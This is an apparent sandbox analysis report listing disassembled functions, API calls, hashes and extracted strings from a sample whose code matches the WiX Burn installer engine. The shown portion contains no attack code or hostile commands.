                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringType
                                                                                                                • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to parse condition "%ls". Version can have a maximum of 4 parts, at position %d.$Failed to set symbol value.$NOT$condition.cpp
                                                                                                                • API String ID: 4177115715-3594736606
                                                                                                                • Opcode ID: 26fa86fa2be5e95bd23b9cc1a75898fbd389d9c94424796a95c243647413b5b6
                                                                                                                • Instruction ID: bb6fc3a2c2ac4db40f2bbc519c8a7ae700ef1d804a973148bd0747deeb9118da
                                                                                                                • Opcode Fuzzy Hash: 26fa86fa2be5e95bd23b9cc1a75898fbd389d9c94424796a95c243647413b5b6
                                                                                                                • Instruction Fuzzy Hash: 97F11271604221FFDB25CF99C889BBA7BA8FF0A704F104945F9159E690C3B9DA91CBC0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,success,000000FF,?,Type,00000000,?,?,00000000,?,00000001,?), ref: 009C1CB8
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,error,000000FF), ref: 009C1CD6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareHeapString$AllocateProcess
                                                                                                                • String ID: Code$ExitCode$Failed to allocate memory for exit code structs.$Failed to get @Code.$Failed to get @Type.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$Invalid exit code type: %ls$Type$error$exeengine.cpp$forceReboot$scheduleReboot$success
                                                                                                                • API String ID: 2664528157-1714101571
                                                                                                                • Opcode ID: b049157f36335cd695ec0d07c280a9f6d3ded133b10cf66bfd2f4ab73fcfdbf8
                                                                                                                • Instruction ID: 3cbc5d5f98b03c24da6ac96600aafd9c1a800c2197e6016e764bbe27ac4d9990
                                                                                                                • Opcode Fuzzy Hash: b049157f36335cd695ec0d07c280a9f6d3ded133b10cf66bfd2f4ab73fcfdbf8
                                                                                                                • Instruction Fuzzy Hash: 9061E731D4421ABBCB119F95CC41FAE7BA9EF82720F204659F522AB2D2CB749E40C795
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 009E7857
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 009E787C
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 009E789C
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 009E78CF
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 009E78EB
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7916
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E798D
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E79D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Compare$Free
                                                                                                                • String ID: `<u$comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                • API String ID: 318886736-782967201
                                                                                                                • Opcode ID: f0ab7089a329b100c1750fb6cd44b79c479bf99e552e939148ea69a1e8785169
                                                                                                                • Instruction ID: 6af694cbdf9dc2cad8a1616177c68f6f2d247f698f74790470616a5a00acd0d6
                                                                                                                • Opcode Fuzzy Hash: f0ab7089a329b100c1750fb6cd44b79c479bf99e552e939148ea69a1e8785169
                                                                                                                • Instruction Fuzzy Hash: 55616E71908259FBDB16DBD5CC85FAEF7B8AF04320F2046A5E521A71E1D730AE10DB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009AD4A8: EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,009B7040,000000B8,00000000,?,00000000,75C0B390), ref: 009AD4B7
                                                                                                                  • Part of subcall function 009AD4A8: InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 009AD4C6
                                                                                                                  • Part of subcall function 009AD4A8: LeaveCriticalSection.KERNEL32(000000D0,?,009B7040,000000B8,00000000,?,00000000,75C0B390), ref: 009AD4DB
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,009B57BD,?,00000000,00000000), ref: 009B6E34
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,009A4522,?,009EB500,?,009A4846,?,?), ref: 009B6E43
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,009A4522,?,009EB500,?,009A4846,?,?), ref: 009B6EA0
                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 009B6F92
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009B6F9B
                                                                                                                • CloseHandle.KERNEL32(crypt32.dll,?,00000000,?,00000000,00000001,00000000), ref: 009B6FB5
                                                                                                                  • Part of subcall function 009CBD05: SetThreadExecutionState.KERNEL32(80000001), ref: 009CBD0A
                                                                                                                Strings
                                                                                                                • Failed while caching, aborting execution., xrefs: 009B6E98
                                                                                                                • UX aborted apply begin., xrefs: 009B6C94
                                                                                                                • Failed to register bundle., xrefs: 009B6DEE
                                                                                                                • Failed to create cache thread., xrefs: 009B6E71
                                                                                                                • Failed to cache engine to working directory., xrefs: 009B6D71
                                                                                                                • Engine cannot start apply because it is busy with another action., xrefs: 009B6C28
                                                                                                                • core.cpp, xrefs: 009B6C8A, 009B6E67
                                                                                                                • Another per-user setup is already executing., xrefs: 009B6CD8
                                                                                                                • Failed to elevate., xrefs: 009B6D94
                                                                                                                • Failed to set initial apply variables., xrefs: 009B6D02
                                                                                                                • crypt32.dll, xrefs: 009B6ECD, 009B6EE7, 009B6FB4
                                                                                                                • Another per-machine setup is already executing., xrefs: 009B6DC8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CriticalSectionThread$CompareCreateEnterErrorExchangeExecutionInterlockedLastLeaveMutexReleaseState
                                                                                                                • String ID: Another per-machine setup is already executing.$Another per-user setup is already executing.$Engine cannot start apply because it is busy with another action.$Failed to cache engine to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
                                                                                                                • API String ID: 2169948125-4292671789
                                                                                                                • Opcode ID: e80727ef0452d2f551e53b09526000dd25ff46525a6c4de3ecfa644dc8901e56
                                                                                                                • Instruction ID: 5bd59d70e9e9309ab7e7fe9ef6558d1763bb51dc6cbd706a6014be1e097df0f9
                                                                                                                • Opcode Fuzzy Hash: e80727ef0452d2f551e53b09526000dd25ff46525a6c4de3ecfa644dc8901e56
                                                                                                                • Instruction Fuzzy Hash: 83C1B572901219EBDF119F94CD85BFE36B8EF84725F044179FE09AE181DB78A940CBA1
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 009E8161
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 009E817C
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 009E821F
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,009EB518,00000000), ref: 009E825E
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 009E82B1
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,009EB518,000000FF,true,000000FF), ref: 009E82CF
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 009E8307
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 009E844B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                • API String ID: 1825529933-3037633208
                                                                                                                • Opcode ID: 8d24f34b7e78b1539733268dc2a1b1f9a02467167d6cae6432ef42da4454cc89
                                                                                                                • Instruction ID: 738d6c88614231b3d2b495b7e26c69e9a214b1487497d91bd1ae5fa02939440c
                                                                                                                • Opcode Fuzzy Hash: 8d24f34b7e78b1539733268dc2a1b1f9a02467167d6cae6432ef42da4454cc89
                                                                                                                • Instruction Fuzzy Hash: 36B19331518646ABCB228F95CC81F5B77AAFB44734F214654F939AB2E1EB70ED40CB40
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009BE2AF: LoadBitmapW.USER32(?,00000001), ref: 009BE2E5
                                                                                                                  • Part of subcall function 009BE2AF: GetLastError.KERNEL32 ref: 009BE2F1
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 009BE429
                                                                                                                • RegisterClassW.USER32(?), ref: 009BE43D
                                                                                                                • GetLastError.KERNEL32 ref: 009BE448
                                                                                                                • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 009BE54D
                                                                                                                • DeleteObject.GDI32(00000000), ref: 009BE55C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                • API String ID: 164797020-2188509422
                                                                                                                • Opcode ID: bed61f8696aca0cb843a1106462faa93424591adbdf790108adcb876fe6696ef
                                                                                                                • Instruction ID: f3eb325da638b25c39ffb72b28b19728ad421483abaf395d057d945b446ebc56
                                                                                                                • Opcode Fuzzy Hash: bed61f8696aca0cb843a1106462faa93424591adbdf790108adcb876fe6696ef
                                                                                                                • Instruction Fuzzy Hash: FE41B472904259BFDF219BE4DE49AEFBBBDFF04724F100125FA11AA1A0E7749D009B91
                                                                                                                APIs
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,009CBC85,00000001), ref: 009C9E46
                                                                                                                • GetLastError.KERNEL32(?,009CBC85,00000001), ref: 009C9FB6
                                                                                                                • GetExitCodeThread.KERNEL32(00000001,00000000,?,009CBC85,00000001), ref: 009C9FF6
                                                                                                                • GetLastError.KERNEL32(?,009CBC85,00000001), ref: 009CA000
                                                                                                                Strings
                                                                                                                • Failed to execute MSU package., xrefs: 009C9EFB
                                                                                                                • Failed to execute package provider registration action., xrefs: 009C9F17
                                                                                                                • Failed to execute compatible package action., xrefs: 009C9F73
                                                                                                                • Failed to wait for cache check-point., xrefs: 009C9FE7
                                                                                                                • Cache thread exited unexpectedly., xrefs: 009CA047
                                                                                                                • apply.cpp, xrefs: 009C9FDD, 009CA027
                                                                                                                • Failed to execute dependency action., xrefs: 009C9F36
                                                                                                                • Invalid execute action., xrefs: 009CA056
                                                                                                                • Failed to execute EXE package., xrefs: 009C9E7D
                                                                                                                • Failed to execute MSI package., xrefs: 009C9EA6
                                                                                                                • Failed to get cache thread exit code., xrefs: 009CA031
                                                                                                                • Failed to execute MSP package., xrefs: 009C9ECB
                                                                                                                • Failed to load compatible package on per-machine package., xrefs: 009C9F5C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                • API String ID: 3703294532-2662572847
                                                                                                                • Opcode ID: ea614b3657b83d7a31db3d1b262d11a60460651bac19b7e96de07331b92a0308
                                                                                                                • Instruction ID: ee0e4490a91579a1326cfb3e117bf65f9ced16202d0c61344ed124c9fa57e830
                                                                                                                • Opcode Fuzzy Hash: ea614b3657b83d7a31db3d1b262d11a60460651bac19b7e96de07331b92a0308
                                                                                                                • Instruction Fuzzy Hash: 7B716C71E0122AEBDB10CFA48945FBE7BB8EB85B54F10456DF905EB240D3749E009BA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 009E3B3E
                                                                                                                • RegCloseKey.ADVAPI32(00000000,?,009F0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 009AF440
                                                                                                                  • Part of subcall function 009E14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,009AF28D,009F0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 009E14BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseValueVersion
                                                                                                                • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                • API String ID: 2348918689-2631711097
                                                                                                                • Opcode ID: f69bbbea66d0501c6032a6ee87d960c51d5b79e05fb570288696ff48c4a28f99
                                                                                                                • Instruction ID: 8e3c89fd96e53ded5847eab64df47d41453d133f9bb639f216a66ceae93e3756
                                                                                                                • Opcode Fuzzy Hash: f69bbbea66d0501c6032a6ee87d960c51d5b79e05fb570288696ff48c4a28f99
                                                                                                                • Instruction Fuzzy Hash: 4151F532D4136AFBCF219AE0CC5ABBFB6A8EB85754F114535FA00B61A1EB749D1097C0
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 009CCC9D
                                                                                                                  • Part of subcall function 009B4D8D: UuidCreate.RPCRT4(?), ref: 009B4DC0
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,009C2401,?,?,00000000,?,?,?), ref: 009CCD7B
                                                                                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 009CCD85
                                                                                                                • GetProcessId.KERNEL32(009C2401,?,?,00000000,?,?,?,?), ref: 009CCDBD
                                                                                                                  • Part of subcall function 009B54DC: lstrlenW.KERNEL32(?,?,00000000,?,009EB500,?,00000000,?,009A452F,?,009EB500), ref: 009B54FD
                                                                                                                  • Part of subcall function 009B54DC: GetCurrentProcessId.KERNEL32(?,009A452F,?,009EB500), ref: 009B5508
                                                                                                                  • Part of subcall function 009B54DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,009A452F,?,009EB500), ref: 009B553F
                                                                                                                  • Part of subcall function 009B54DC: ConnectNamedPipe.KERNEL32(?,00000000,?,009A452F,?,009EB500), ref: 009B5554
                                                                                                                  • Part of subcall function 009B54DC: GetLastError.KERNEL32(?,009A452F,?,009EB500), ref: 009B555E
                                                                                                                  • Part of subcall function 009B54DC: Sleep.KERNEL32(00000064,?,009A452F,?,009EB500), ref: 009B5593
                                                                                                                  • Part of subcall function 009B54DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55B6
                                                                                                                  • Part of subcall function 009B54DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55D1
                                                                                                                  • Part of subcall function 009B54DC: WriteFile.KERNEL32(?,009A452F,009EB500,00000000,00000000,?,009A452F,?,009EB500), ref: 009B55EC
                                                                                                                  • Part of subcall function 009B54DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,009A452F,?,009EB500), ref: 009B5607
                                                                                                                  • Part of subcall function 009E0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,009A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 009E0A38
                                                                                                                  • Part of subcall function 009E0A28: GetLastError.KERNEL32(?,?,009A4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 009E0A46
                                                                                                                • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,009CCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 009CCE41
                                                                                                                • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,009CCBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 009CCE50
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,009CCBEF,?,?,?,?,?,00000000,?,?,?), ref: 009CCE67
                                                                                                                Strings
                                                                                                                • %ls -%ls %ls %ls %u, xrefs: 009CCD40
                                                                                                                • Failed to wait for embedded executable: %ls, xrefs: 009CCE24
                                                                                                                • Failed to allocate embedded command., xrefs: 009CCD54
                                                                                                                • burn.embedded, xrefs: 009CCD38
                                                                                                                • Failed to create embedded pipe., xrefs: 009CCD27
                                                                                                                • Failed to create embedded process at path: %ls, xrefs: 009CCDB3
                                                                                                                • Failed to create embedded pipe name and client token., xrefs: 009CCD00
                                                                                                                • embedded.cpp, xrefs: 009CCDA6
                                                                                                                • Failed to process messages from embedded message., xrefs: 009CCE04
                                                                                                                • Failed to wait for embedded process to connect to pipe., xrefs: 009CCDDF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                • API String ID: 875070380-3803182736
                                                                                                                • Opcode ID: 1a41986292a0458d5a68438e57398bdfbd5c9442ddea89147778069041d17915
                                                                                                                • Instruction ID: bf9dce18c48553659d5f1c14d41d55252d60432ce45f3223738a116b5580ebc2
                                                                                                                • Opcode Fuzzy Hash: 1a41986292a0458d5a68438e57398bdfbd5c9442ddea89147778069041d17915
                                                                                                                • Instruction Fuzzy Hash: 27516EB2D4022DBBDF129B94DC46FDEBFB8AB08720F110525FA05B6191D7749E409BD2
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AEE4C
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009AEE04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeapString$AllocateProcess
                                                                                                                • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                                                                                • API String ID: 336948655-956346883
                                                                                                                • Opcode ID: 21e9d7cc4868a8df3ed208d1730d95cfe2cfcef55476f8e7dd97fb8bde2f6e66
                                                                                                                • Instruction ID: 15e12daf1e58bf90f5fedfa63f644420aaa669370365f1b02eaf2303608dd694
                                                                                                                • Opcode Fuzzy Hash: 21e9d7cc4868a8df3ed208d1730d95cfe2cfcef55476f8e7dd97fb8bde2f6e66
                                                                                                                • Instruction Fuzzy Hash: 93518F31E0172AFBCB15DF99C885EAEB7B8BF45714F2045A9BA15AB250C771DE0087D0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,009E8468,00000001,?), ref: 009E7F9E
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,009E8468,00000001,?), ref: 009E7FB9
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,009E8468,00000001,?), ref: 009E7FD4
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,009E8468,00000001,?), ref: 009E8040
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,009E8468,00000001,?), ref: 009E8064
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,009E8468,00000001,?), ref: 009E8088
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,009E8468,00000001,?), ref: 009E80A8
                                                                                                                • lstrlenW.KERNEL32(006C0064,?,009E8468,00000001,?), ref: 009E80C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
